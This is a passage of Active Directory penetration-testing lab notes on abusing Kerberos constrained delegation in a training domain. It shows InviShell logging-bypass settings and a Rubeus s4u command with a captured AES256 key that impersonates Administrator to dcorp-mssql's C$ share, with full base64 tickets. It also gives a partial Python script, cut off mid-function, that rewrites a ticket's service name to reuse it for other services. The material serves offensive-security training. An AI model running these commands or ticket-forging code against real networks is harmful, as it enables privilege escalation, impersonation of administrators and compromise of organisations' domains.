TERMSRV/DCORP-ADMINSRV, TERMSRV/dcorp-
adminsrv.dollarcorp.moneycorp.local...}
usncreated : 13891
usnchanged : 1164786
lastlogon : 7/3/2024 8:38:27 AM
badpwdcount : 0
cn : DCORP-ADMINSRV
msds-supportedencryptiontypes : 28
objectsid : S-1-5-21-719815819-3726368948-3917688648-1105
primarygroupid : 515
iscriticalsystemobject : False
name : DCORP-ADMINSRV
dnshostname : dcorp-adminsrv.dollarcorp.moneycorp.local

From an attacker's perspective, if we compromise the machine account of DCORP-ADMINSRV we can access the TIME service on dcorp-dc.dollarcorp.moneycorp.local as any user, including a domain admin. TIME itself is of little use, but because the service class in a ticket is not validated (see the /altservice note later in this section), the same delegation right yields a ticket for another service on the DC, such as LDAP.

Using Active directory Module


C:\Windows\system32>C:\Ad\Tools\InviShell\RunWithPathAsAdmin.bat
C:\Windows\system32>set COR_ENABLE_PROFILING=1
C:\Windows\system32>set COR_PROFILER={cf0d821e-299b-5307-a3d8-b283c03916db}

C:\Windows\system32>set COR_PROFILER_PATH=C:\AD\Tools\InviShell\InShellProf.dll

C:\Windows\system32>powershell
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

Install the latest PowerShell for new features and improvements! https://aka.ms/PSWindows

PS C:\Windows\system32> Import-Module C:\AD\tools\ADModule-master\Microsoft.ActiveDirectory.Management.dll
PS C:\Windows\system32> Import-Module C:\AD\tools\ADModule-master\ActiveDirectory\ActiveDirectory.psd1
PS C:\Windows\system32> Get-ADObject -Filter { msDS-AllowedToDelegateTo -ne "$null" } -Properties
msDS-AllowedToDelegateTo

DistinguishedName : CN=DCORP-ADMINSRV,OU=Applocked,DC=dollarcorp,DC=moneycorp,DC=local
msDS-AllowedToDelegateTo : {TIME/dcorp-dc.dollarcorp.moneycorp.LOCAL, TIME/dcorp-DC}
Name : DCORP-ADMINSRV
ObjectClass : computer
ObjectGUID : 2e036483-7f45-4416-8a62-893618556370

DistinguishedName : CN=web svc,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
msDS-AllowedToDelegateTo : {CIFS/dcorp-mssql.dollarcorp.moneycorp.LOCAL, CIFS/dcorp-mssql}
Name : web svc
ObjectClass : user
ObjectGUID : b7ab147c-f929-4ad2-82c9-7e1b656492fe

Performing the attack

Using websvc
PS C:\Windows\system32> Get-DomainUser -TrustedToAuth

logoncount : 11
badpasswordtime : 12/31/1600 4:00:00 PM
distinguishedname : CN=web svc,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
objectclass : {top, person, organizationalPerson, user}
displayname : web svc
lastlogontimestamp : 5/17/2024 10:27:48 PM
userprincipalname : websvc
whencreated : 11/14/2022 12:42:13 PM
samaccountname : websvc
codepage : 0
samaccounttype : USER_OBJECT
accountexpires : NEVER
countrycode : 0
whenchanged : 5/18/2024 5:27:48 AM
instancetype : 4
usncreated : 38071
objectguid : b7ab147c-f929-4ad2-82c9-7e1b656492fe
sn : svc
lastlogoff : 12/31/1600 4:00:00 PM
msds-allowedtodelegateto : {CIFS/dcorp-mssql.dollarcorp.moneycorp.LOCAL, CIFS/dcorp-mssql}
objectcategory : CN=Person,CN=Schema,CN=Configuration,DC=moneycorp,DC=local
dscorepropagationdata : {11/14/2022 12:42:13 PM, 1/1/1601 12:00:00 AM}
serviceprincipalname : {SNMP/ufc-adminsrv.dollarcorp.moneycorp.LOCAL, SNMP/ufc-adminsrv}
givenname : web
usnchanged : 431258
lastlogon : 5/18/2024 3:11:43 AM
badpwdcount : 0
cn : web svc
useraccountcontrol : NORMAL_ACCOUNT, DONT_EXPIRE_PASSWORD, TRUSTED_TO_AUTH_FOR_DELEGATION
objectsid : S-1-5-21-719815819-3726368948-3917688648-1114
primarygroupid : 513
pwdlastset : 11/14/2022 4:42:13 AM
name : web svc

If we can compromise the websvc account, we can access the file system service (CIFS) on dcorp-mssql.dollarcorp.moneycorp.local as any user, including a domain admin. We already obtained the AES256 key of the websvc account during the lateral movement phase. Because Rubeus accepts that key on the command line and requests websvc's TGT with it, the attack can be run from our normal student prompt; no separate session as websvc is needed.

With the Rubeus s4u action we impersonate the domain Administrator to the CIFS service on dcorp-mssql.dollarcorp.moneycorp.LOCAL. Rubeus requests a TGT for websvc, performs S4U2self for Administrator, performs S4U2proxy for the SPN given in /msdsspn and, with /ptt, injects the resulting ticket into the current session. Before the attack the administrative share is not reachable:
C:\Windows\system32>dir \\dcorp-mssql.dollarcorp.moneycorp.LOCAL\C$\
Access is denied.

C:\Windows\system32>C:\Ad\Tools\Rubeus.exe s4u /user:websvc /aes256:2d84a12f614ccbf3d716b8339cbbe1a650e5fb352edc8e879470ade07e5412d7 /impersonateuser:Administrator /msdsspn:CIFS/dcorp-mssql.dollarcorp.moneycorp.LOCAL /ptt

______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/

v2.2.1

[*] Action: S4U

[*] Using aes256_cts_hmac_sha1 hash: 2d84a12f614ccbf3d716b8339cbbe1a650e5fb352edc8e879470ade07e5412d7
[*] Building AS-REQ (w/ preauth) for: 'dollarcorp.moneycorp.local\websvc'
[*] Using domain controller: 172.16.2.1:88
[+] TGT request successful!
[*] base64(ticket.kirbi):

doIF5jCCBeKgAwIBBaEDAgEWooIEvzCCBLthggS3MIIEs6ADAgEFoRwbGkRPTExBUkNPUlAuTU9ORVlD
T1JQLkxPQ0FMoi8wLaADAgECoSYwJBsGa3JidGd0Gxpkb2xsYXJjb3JwLm1vbmV5Y29ycC5sb2NhbKOC
BFswggRXoAMCARKhAwIBAqKCBEkEggRF6wC8PyqAJ0Yibv0CiCoWOqmYJK69Cklsxy8DQa3Fz/q2jRSm
YmwHZ0oqKCMIdAs3mhQYUEI6gtlA4zRjKve2k4Iw4wFC+epVjyb+dzGNj84r94KXxtmp3Gtjy9dr5tXw
kPE1Ra/l6lOclzrwczYxv1nJWF+NTD+HRQex01aCn88j8ZXtQk62KGPdaZj6rTSltJr3vFwt3aPp1SBy
WB2FJId3XIaP9N2vIuQvJICdSVVMn7OVFQ2BS7uHTVlTipODSeeLdQYCLuIzVZ9Mg76KBm3pUAqbE0x7
0LhkRtih5rmMAebF2CCc/ARAY2C0IYhCxiHp0Q1HQzP7YTf59JVmwji8+RYLPfaWmgCySFM8LVcJhQkY
/x9SsZ9y7N5f7y2YIXeOFVuPAY6eqy4kavnyYsoQaUebDZJxSdSpUOB4fwUpaaEz50tjJXGFsfgx5gQg
MwIKoKoazriUsJP+hRRujb/keq8vzom+U7eAzIMbYQPXGF71qKtatXOPywr+zGDPkQTbW22kMsYetUmt
2T2tPUaXx8vZMG5pCE6OC4jPTwV4SqbEAqNXDQdxwtSMQhd4DMOpNh2VUblZDFj/yVKZ1ht5gCbaBIO+
W1oVGTUdVuANNGtzhVkV/wva5adfvLGanlN3TzXUPE5Cgdxz4SmMpIzcNVeqxz86adfxSvIYhNtsM526
dNzMSHaVjL6d6mTEAhTXREOrBnWDmrovmEg74NmmJKMXVCYLxdinu2dJGiWLPRFEvWV1bAwlVFRRc1qW
48/mx2rBc36VEy0aKPG/o7LxXsZPupAqysZdYY3VVkTZ328F4gFvVwEYDb1UDvoB7tj5XSJpEdK+mM37
I0EBev46L2U1RLtT6wGGNN1VVq8GYoYdQNIGwH+yjITphdUx+HkxPPB4bOnJnDuSlPXe4wF2VqKi2qeb
WLvHnNsD0kK5wakgDz9COxDXbE2SvDLnPuTZVr7V5ycrawXGn9SweC7sBHMNKK2I0PijZDhx9rjQKUmh
KkZW3bFMh3w6MV5s8Z6I7ri+2pdivQSpXBY+rE9KXCwYqbdLay9iQh1osOwtbEvVNR6IHOPagSXS4I5g
SiWO5+aZMV07WqIOkU9wk+aBltt/bOtH0nEvtx2uiEO78QZJ0cy68ZAK3KJyMhczGCfua3bzxvStgdxU
zr0L4mrM0Ultz13JIcVjtu6/JuOut2bJT+tuub/DC+lOtUlcJTZ5b4RU2Ku1lQ96FvROIVz70hBKZSUO
8fEckOZWILVH9ufC7BE+dgbLjMRZFIt0fNpHlvf7bYnwnE6s/dhH0r9x/pNdGL6N7Xa2SajNlRUTx1zp
XMYETQPcWVumyjhmMBgCLondrU2/48VTvldeN0WHsO7HxR8DMetdJmVKoRvCCus6tQa3UQi2HE1tx3Zk
IedtZiVdyfM8sZnwMdfV40nk5p74jvkaqCfA4MTqMIMx4sK1G6OCAREwggENoAMCAQCiggEEBIIBAH2B
/TCB+qCB9zCB9DCB8aArMCmgAwIBEqEiBCCw5EcwvEbHe2H4tf7YNVz8a5fmSe9jjbDCysx2/t0uMaEc
GxpET0xMQVJDT1JQLk1PTkVZQ09SUC5MT0NBTKITMBGgAwIBAaEKMAgbBndlYnN2Y6MHAwUAQOEAAKUR
GA8yMDI0MDcwMzE1MzMzOFqmERgPMjAyNDA3MDQwMTMzMzhapxEYDzIwMjQwNzEwMTUzMzM4WqgcGxpE
T0xMQVJDT1JQLk1PTkVZQ09SUC5MT0NBTKkvMC2gAwIBAqEmMCQbBmtyYnRndBsaZG9sbGFyY29ycC5t
b25leWNvcnAubG9jYWw=

[*] Action: S4U

[*] Building S4U2self request for: 'websvc@DOLLARCORP.MONEYCORP.LOCAL'
[*] Using domain controller: dcorp-dc.dollarcorp.moneycorp.local (172.16.2.1)
[*] Sending S4U2self request to 172.16.2.1:88
[+] S4U2self success!
[*] Got a TGS for 'Administrator' to 'websvc@DOLLARCORP.MONEYCORP.LOCAL'
[*] base64(ticket.kirbi):

doIGTDCCBkigAwIBBaEDAgEWooIFPjCCBTphggU2MIIFMqADAgEFoRwbGkRPTExBUkNPUlAuTU9ORVlD
T1JQLkxPQ0FMohMwEaADAgEBoQowCBsGd2Vic3Zjo4IE9jCCBPKgAwIBF6EDAgECooIE5ASCBOAZvBsS
uyc4huMJKS7ihjKcqgU2l+dXEUHgwJt/IFZRjMC3eum5t5MCEvxxwE5+xPu1y8ZWvtIkP70lHbd9ddYV
STBXRijM+HDA19650xLf/gePiIM/lmUMR/Q2WvEEQaynhUaZ/KR4V5FXcJXDVO+SckEgVDoWrjB3EHVc
sTwdT+DUp+WeBgLIyJmpdAYoz0SrjTonJEQ14dxX138a9bp3j50uWEjWA4pcAuewC9vpkDCdNIvtajCu
No8ADb0Ijpx67m70NNHU+yYeUUC1RZh9Hacyq2FV59CAMLtZ+G1TstFnltpBGriA8J/OXjynSh8uutz1
ArqOIUTP2lNeG3evZA0Qc/l2GvwdsKignG7EoCFe6iK7r0d4v4Hx9UPGe3PCLJURi+EYx7eQxjGsoRST
oeOgVWrgeL1NKNm9kOag1jhY18WL1v/oAthyIR6rCELqHekW3gXDZyErEBp+mn5X8919t9IHEnOlZ9ML
oejyNmP86yxO49yrpnCHGJ13WvTg3/Eb/n86iS9tAokWRHWGijzrUj60jYNqraE2P/t/KKyUtJ8BHqAv
BMQhNK7tNMZ4gX+LOkqzLgR0HaTBLud2xoIWxK3BwLub24IPYNY+oGkn+Ecvj+UTCLOe/lD0I13FDZsC
/aYMn4XH1uzDtao2vOBq4akPFtUurf7uJehWqsfmJdi1aeN2TcEYiz+S/hHd4m2r1WLVU/ygb5r2Euhd
ibkcy0ntb8dkrc7QVjSzNbZOOe7mzpBRwDd+vW1tJF6aTtY1I6VCBDHOjpQSyJDbnPdzuI2mlr/IzI7T
4kFwYvpouChJeHRs42weMCaL1+QHxlEl8qnsKjm6LiMc/UXu0Unqlz+zDSaRNK6g/hugniUGGkqDIuvz
KqqToOkxhrJ9OKJLKsWAPCT8/ULdgU/2uBz5Qu2gSkBZIbuj6BsQ7jHMPgSld1lFTuL6fkubDe5C+NQF
VRkAn5mUPY458knWTolvrua4IyAXz96YukAZa4ZlAE72CU7OiLsM5qlgblZD8sVcVDCa+z+QsRWjlqCi
rviYaKc4RVSO6RHRWLs2KGvTMC+gCBucXvK6BdiyLFagjYKER8uLh/lUrgI5BLbMkDmlsmO3N2Irxauj
0Cqau/70QEzh2K8JFROf8AJy9Ux37BrbhvPsPMmHh7kkHHPZSPTrz+1Qr8fSQMN6siSlhWHTSpNqIvhs
dSj5MRU+4Haj9M6dOKCGt85WTMAxjs/HUbFD4LqR6p5iN1EKsXKQLBHnpp3O9aZN/2cApdxmts/h9nCE
hfGxYtI+KH7pMpCtTcKKs+74JHWECbNXhhE4dD3zKr4W0CKEpOSiUBrPOkwBoLuLZHIag0qTibs8raOg
sX6jY7MeXv/wFXl9idEpTvq6kFu1uxSW3DaMLHTwgiW1sgFRVjgTBlD4ldy+XvXXr8qLFQgFataZmxFC
XKmt1kbWzJTZvcyv/DT7qKyHE9hYLpv8n84sxM0PL8rLBzRqX2Ph+VVS2jw44shJ8l23qDgr5pUFUqf7
pUPYdx5SiroWV/iIo5e2IO25QEfs5fC20LUmBv2dur2HMgn+pp6EIMkscA/a+VQ6v02vReRJC1vrXeqj
KyNIHVM7GEi/nJ9xxhKnlIg64fYDQO40fYX3AxaVzvXLQC7+uHFdQhX2YGejgfkwgfagAwIBAKKB7gSB
632B6DCB5aCB4jCB3zCB3KArMCmgAwIBEqEiBCCkviUBg9HTDsy2wR/lU3arTN5pB4TgeoUpViqJh5PL
0KEcGxpET0xMQVJDT1JQLk1PTkVZQ09SUC5MT0NBTKIaMBigAwIBCqERMA8bDUFkbWluaXN0cmF0b3Kj
BwMFAEChAAClERgPMjAyNDA3MDMxNTMzMzlaphEYDzIwMjQwNzA0MDEzMzM4WqcRGA8yMDI0MDcxMDE1
MzMzOFqoHBsaRE9MTEFSQ09SUC5NT05FWUNPUlAuTE9DQUypEzARoAMCAQGhCjAIGwZ3ZWJzdmM=

[*] Impersonating user 'Administrator' to target SPN 'CIFS/dcorp-mssql.dollarcorp.moneycorp.LOCAL'
[*] Building S4U2proxy request for service: 'CIFS/dcorp-mssql.dollarcorp.moneycorp.LOCAL'
[*] Using domain controller: dcorp-dc.dollarcorp.moneycorp.local (172.16.2.1)
[*] Sending S4U2proxy request to domain controller 172.16.2.1:88
[+] S4U2proxy success!
[*] base64(ticket.kirbi) for SPN 'CIFS/dcorp-mssql.dollarcorp.moneycorp.LOCAL':

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
[+] Ticket successfully imported!

C:\Windows\system32>klist

Current LogonId is 0:0x847a8

Cached Tickets: (1)

#0> Client: Administrator @ DOLLARCORP.MONEYCORP.LOCAL


Server: CIFS/dcorp-mssql.dollarcorp.moneycorp.LOCAL @ DOLLARCORP.MONEYCORP.LOCAL
KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
Ticket Flags 0x40a10000 -> forwardable renewable pre_authent name_canonicalize
Start Time: 7/3/2024 8:33:39 (local)
End Time: 7/3/2024 18:33:38 (local)
Renew Time: 7/10/2024 8:33:38 (local)
Session Key Type: AES-128-CTS-HMAC-SHA1-96
Cache Flags: 0
Kdc Called:

C:\Windows\system32>dir \\dcorp-mssql.dollarcorp.moneycorp.LOCAL\C$\
Volume in drive \\dcorp-mssql.dollarcorp.moneycorp.LOCAL\C$ has no label.
Volume Serial Number is 76D3-EB93

Directory of \\dcorp-mssql.dollarcorp.moneycorp.LOCAL\C$

05/08/2021 01:15 AM <DIR> PerfLogs
11/14/2022 05:44 AM <DIR> Program Files
11/14/2022 05:43 AM <DIR> Program Files (x86)
12/03/2023 07:36 AM <DIR> Transcripts
11/15/2022 02:48 AM <DIR> Users
01/10/2024 03:17 AM <DIR> Windows
0 File(s) 0 bytes
6 Dir(s) 3,780,669,440 bytes free

Moreover, access is not limited to the service class named in msDS-AllowedToDelegateTo. The service name in a ticket is stored in plaintext outside the encrypted part, and the target host only checks that the ticket decrypts with its own key; the KDC does not re-check the service class and the host does not compare it with what was issued. Since every SPN registered to dcorp-mssql$ shares that key, a ticket obtained for CIFS can be turned into a ticket for HOST, HTTP or any other service class on the same host with the /altservice flag in Rubeus.
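The /altservice behaviour just described follows from where the SPN lives in a ticket, and the same property is why the Rubeus monitor in the unconstrained delegation section above could print the DC's name, flags and lifetime without holding any key. The Python below is an added worked example, not part of the course material and not Rubeus code: it parses the S4U2proxy ticket for CIFS/dcorp-mssql copied verbatim from the Rubeus output above (a base64 KRB-CRED, the .kirbi format) with a small DER reader, then does what /altservice (and the Rubeus tgssub action) does, rewriting the service class in the two plaintext copies of the SPN (Ticket.sname and the KrbCredInfo inside the KRB-CRED enc-part, which Rubeus and mimikatz store with etype 0, that is unencrypted) and re-serialising. The encrypted part, which carries the PAC and is keyed to dcorp-mssql$'s account, is left untouched, which is exactly why the target accepts the rewritten ticket. The names KIRBI_CIFS, parse_kirbi, substitute_service and the helper functions are mine, and the parser understands only what a .kirbi needs, not general ASN.1. Pointed at the TGT printed by the Rubeus monitor earlier, parse_kirbi reports DCORP-DC$ as the client with the forwarded flag set.

```python
import base64

# S4U2proxy ticket for CIFS/dcorp-mssql copied verbatim from the Rubeus output above (base64
# .kirbi = KRB-CRED). It is keyed to dcorp-mssql$ and long expired, so it only serves as input.
KIRBI_CIFS = """
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
"""

# RFC 4120 TicketFlags bit numbers (bit 0 is the most significant) -> klist-style names
FLAG_BITS = {1: "forwardable", 2: "forwarded", 3: "proxiable", 4: "proxy", 8: "renewable", 9: "initial",
             10: "pre_authent", 11: "hw_authent", 13: "ok_as_delegate", 15: "name_canonicalize"}

def kirbi_bytes(b64):
    return base64.b64decode("".join(b64.split()))   # tolerate Rubeus' line wrapping

def _tlv(buf, pos):
    """Read one DER TLV at pos -> (tag, value bytes, position after it)."""
    tag, length, pos = buf[pos], buf[pos + 1], pos + 2
    if length & 0x80:                                # long form: 0x8n followed by n length bytes
        n = length & 0x7F
        length, pos = int.from_bytes(buf[pos:pos + n], "big"), pos + n
    return tag, buf[pos:pos + length], pos + length

def decode(buf):
    """DER -> nested lists: (tag, [children]) for constructed tags, (tag, bytes) for primitives."""
    items, pos = [], 0
    while pos < len(buf):
        tag, val, pos = _tlv(buf, pos)
        items.append((tag, decode(val) if tag & 0x20 else val))
    return items

def encode(items):
    """Inverse of decode(); every length is recomputed, so an edited tree re-serialises cleanly."""
    out = b""
    for tag, val in items:
        body = encode(val) if isinstance(val, list) else val
        n, size = len(body), (len(body).bit_length() + 7) // 8
        out += bytes([tag]) + (bytes([n]) if n < 0x80 else bytes([0x80 | size]) + n.to_bytes(size, "big")) + body
    return out

def field(seq, n):                                   # children of explicit context tag [n], by reference
    return next(val for tag, val in seq if tag == 0xA0 | n)

def inner(seq, n):                                   # the single element wrapped by [n]
    return field(seq, n)[0][1]

def principal(pn):                                   # PrincipalName SEQUENCE -> "class/host" or "user"
    return "/".join(v.decode() for _, v in inner(pn, 1))

def flag_names(bits):
    """TicketFlags BIT STRING contents (first byte = unused-bit count) -> flag names."""
    value, width = int.from_bytes(bits[1:], "big"), 8 * (len(bits) - 1)
    return [name for bit, name in FLAG_BITS.items() if value >> (width - 1 - bit) & 1]

def _parts(raw):
    """KRB-CRED -> (tree, Ticket SEQUENCE, KrbCredInfo SEQUENCE, cred EncryptedData, EncKrbCredPart tree)."""
    cred = decode(raw)
    assert cred[0][0] == 0x76, "not a KRB-CRED (APPLICATION 22)"
    seq = cred[0][1][0][1]
    ticket = inner(seq, 2)[0][1][0][1]               # tickets[0]: APPLICATION 1 -> SEQUENCE
    enc = inner(seq, 3)                              # Rubeus/mimikatz write this with etype 0 (plaintext)
    assert int.from_bytes(inner(enc, 0), "big") == 0, "enc-part is really encrypted"
    part = decode(inner(enc, 2))                     # EncKrbCredPart (APPLICATION 29)
    return cred, ticket, inner(part[0][1][0][1], 0)[0][1], enc, part

def parse_kirbi(b64):
    """Plaintext metadata of a .kirbi: who it is for, which SPN, flags, lifetime, encryption types."""
    _, ticket, info, _, _ = _parts(kirbi_bytes(b64))
    return {"client": f"{principal(inner(info, 2))}@{inner(info, 1).decode()}",
            "service": f"{principal(inner(info, 9))}@{inner(info, 8).decode()}",
            "ticket_sname": principal(inner(ticket, 2)),
            "ticket_etype": int.from_bytes(inner(inner(ticket, 3), 0), "big"),
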